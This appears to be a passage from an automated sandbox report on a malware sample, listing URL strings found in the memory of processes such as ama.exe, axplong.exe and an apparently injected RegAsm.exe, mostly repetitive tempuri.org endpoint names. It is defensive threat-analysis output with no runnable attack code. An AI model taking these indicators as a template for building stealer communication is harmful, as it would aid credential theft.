Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002C33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24ResponseD
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: ama.exe, 00000004.00000002.2393678580.00000000028E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/x
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4221491538.0000018F5B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257707638.0000018F5BD2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
